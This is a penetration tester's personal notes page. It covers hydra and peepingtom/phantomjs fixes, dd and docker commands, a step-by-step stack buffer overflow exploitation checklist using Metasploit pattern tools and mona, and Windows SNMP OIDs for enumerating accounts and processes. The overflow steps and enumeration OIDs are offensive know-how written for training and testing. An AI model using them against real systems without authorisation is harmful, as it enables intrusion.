thc-hydra

[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol

The default hydra-thc install on Kali at the time of this post, is not compiled to support SSL.  Download thc-hydra from source and compile to get it working.

Kali - peepingtom + capture.js + phantomjs problems

At the time of this post, I experienced the following problems getting peepingtom and phantom.js up and running:

Step 1:

Compile phantom.js from source.  If you are experiencing problems with the ./build.sh script complaining of out of memory problems, increase your swap space.  Follow the directions on this blog here:

https://www.digitalocean.com/community/tutorials/how-to-add-swap-on-ubuntu-14-04

Step 2.
Copy the built binary into /usr/bin/phantomjs

Step 3.
Modify capture.js file to the following:

var page = require('webpage').create(),

    url, filename, size;

var args = require('system').args;

url = args[1]

filename = args[2]

// url = phantom.args[0];

// filename = phantom.args[1];

page.viewportSize = { width: 800, height: 600 };

page.clipRect = { top: 0, left: 0, width: 800, height: 600 };

page.open(url, function (status) {

    //if (status !== 'success') {

    //    console.log('Unable to load the address!');

    //} else {

        window.setTimeout(function () {

            page.render(filename);

            phantom.exit();

        }, 200);

    //}

});

Windows Infections without tools

http://909research.com/find-a-windows-infection-quickly-without-tools/

VirtualBox Ubuntu stuck on 640x480

sudo apt-get install virtualbox-guest-dkms

dd

http://superuser.com/questions/246427/why-does-my-dd-backup-of-macbook-os-x-fail-to-boot-upon-restore

sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K

You will also need to use those options for the restore:

sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K

Start another shell session on same container in Docker

docker exec -it "id of running container" bash

Interactive Regex tester

https://regex101.com/#python

OSX FW Config

https://discussions.apple.com/thread/6645172

Refresher buffer overflow

1.  Fuzz 

2.  Load immunity debugger

3.  Overwrite EIP register

4.  Use /usr/share/metasploit-framework/tools/pattern_create.rb [length]

5.  Find value crashed in EIP register.

6.  Use /usr/share/metasploit-framework/tools/pattern_offset.rb [value] of the crashed value in the EIP register.

7.  Use this as the new base length for the crash.

8.  Find out if there are any restricted characters for payload in shell code.

9.  !mona modules in immunity debugger.  So we can find the loaded libraries.  Find one that does not have protection ( ASLR , the range of memory does not include null bytes)

10. Search for jmp esp register to use:

10.a  Use /usr/share/metasploit-framework/tools/nasm_shell.rb to search for the opcode equivalent of jump esp

nasm > jmp esp 

00000000 FFE4      jmp esp

11.  Search for this op code in mona again:  !mona find -s “\xff\xe4” -m slmfc.dll

12.  Select one that does not have bad addresses, double check the contents at this address by double clicking.  

13.  Replace your EIP address that will be modified during the overflow with this jmp esp register value.

14.  To validate, set a breakpoint at the address of the jmp esp register.  Run the exploit again to make sure that the address has been hit.

15.  Add shell code so that jsp will now run the shell code

Common Microsoft Windows SNMP parameters

1.3.6.1.2.1.25.1.6.0	System Processes
1.3.6.1.2.1.25.4.2.1.2	Running Programs
1.3.6.1.2.1.25.4.2.1.4	Processes Path
1.3.6.1.2.1.25.2.3.1.4	Storage Units
1.3.6.1.2.1.25.6.3.1.2	Software Name
1.3.6.1.4.1.77.1.2.25	User Accounts
1.3.6.1.2.1.6.13.1.3	TCP Local Ports